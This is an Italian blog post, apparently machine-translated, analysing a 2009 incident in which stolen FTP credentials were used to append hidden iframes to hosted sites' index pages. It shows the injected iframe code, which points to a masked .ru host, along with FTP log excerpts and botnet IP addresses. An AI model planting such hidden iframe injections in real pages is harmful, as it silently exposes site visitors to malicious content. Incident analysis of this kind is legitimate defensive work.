Tutta la vulnerabilità IFRAME nascosto è in corso da qualche tempo, solo alcuni dei nostri clienti sono stati effettuati da questo. La rete è ancora piena di questo problema e mentre alcuni dicono che l'iniezione sono risultati di insicurezze php, mysql iniezione o cross site scripting, mentre altri indicano keylogger e dirottati credenziali FTP. Nel nostro caso l'exploit non è stato a causa di una vulnerabilità di un'applicazione, ma piuttosto di Hijacked informazioni ftp login. Attacchi indovinare bruta della password vigore non sono stati eseguiti su tale conto, né qualsiasi altro account sullo stesso server. In questo particolare tipo di attacco, alla fine di index.php / index.html un'istruzione IFRAME è stato allegato modifica indesiderata tag pagina di chiusura.
iframe src = "http: //***.ru: 8080 / index.php" width = 111 height = 162 style = "visibi
iframe src = "http: //***.ru: 8080 / index.php" width = 136 height = 162 style = "visibility: hidden" / iframe
iframe src = "http: //***.ru: 8080 / index.php" width = 141 height = 156 style = "visibility: hidden" / iframe
Alcuni dei file index.php avevano più istruzioni IFRAME aggiunti alla fine. Conoscere il nome utente di account interessato e il nome del file in questione ho cercato in / var / log / messages per eventuali voci correlate e ha colpito jackpot:
agosto 01:27:59 web152 pure-ftpd: (?@94.218.69.243) [INFO] utente è loggato in
27 agosto 01:28:00 web152 pure-ftpd: (user@94.218.69.243) [AVVISO] / home / utente // public_html / index.php scaricato (2311 bytes, 1001.70KB / sec)
27 agosto 01:28:00 web152 pure-ftpd: (user@94.218.69.243) [INFO] Esci.
27 Agosto 01:28: 04 web152 pure-ftpd: (?@78.92.144.185) [INFO] utente è loggato in
27 agosto 01:28:05 web152 pure-ftpd: (user@78.92.144.185) [ATTENZIONE] / home / user // public_html /index.php caricati (2353 bytes, 10.42KB / sec)
27 agosto 01:28:05 web152 pure-ftpd: (user@78.92.144.185) [INFO] Logout.
La cosa interessante da notare qui è che anche se il download / upload di index.php avviene all'interno di una seconda finestra 6, l'indirizzo IP di origine per il download e l'upload non sono gli stessi. Nei prossimi giorni lo stesso file viene scaricato e caricato, ma non dallo stesso insieme di indirizzi IP. Durante i pochi giorni che mi permetteva questo accada mentre stavo controllando tale attività e raccogliere gli indirizzi IP per vedere se emerge un modello:
83.82.57.39 GeoIP Edizione Nazionale: NL, Netherlands
95.52.163.74 GeoIP Edizione Nazionale: RU, Federazione Russa
189.122.164.40 GeoIP Edizione Nazionale: BR, Brazil
69.159.47.21 GeoIP Edizione Nazionale: CA, Canada
85.221.184.164 GeoIP Edizione Nazionale: PL, Polonia
98.243.198.220 GeoIP Edizione Nazionale: US, Stati Uniti
78.30.154.22 GeoIP Edizione Nazionale: RS, Serbia
77.81.33.229 GeoIP Edizione Nazionale: RO, Romania
83.6.73.91 GeoIP Edizione Nazionale: PL, Poland
190.198.3.27 GeoIP Edizione Nazionale: VE , Venezuela
75.208.130.92 GeoIP Edizione Nazionale: US, Stati Uniti
68.84.202.157 GeoIP Edizione Nazionale: US, Stati Uniti
75.80.81.104 GeoIP Edizione Nazionale: US, Stati Uniti
Vedendo che nessun modello chiaro è evidente qui e considerando che l'indirizzo IP è stato diverso per ogni connessione è la mia logica che il computer di questi indirizzi IP erano una parte di una botnet. La mia ipotesi è che uno sviluppatore aveva salvato la password di account ed è stato infettato da software dannoso che è stato in grado di raccogliere le credenziali FTP.
Cleanup incluso il ripristino dei file e la modifica di tutte le password conto / ftp / e-mail e database.
Posted by Max Veprinsky 21 settembre st 2009 Sicurezza , ospitando
«HowTo errori di visualizzazione PHP quando non si ha accesso a php.ini Errore Drupal Watchdog »
Commenti
Nessun commento:
Posta un commento
Nota. Solo i membri di questo blog possono postare un commento.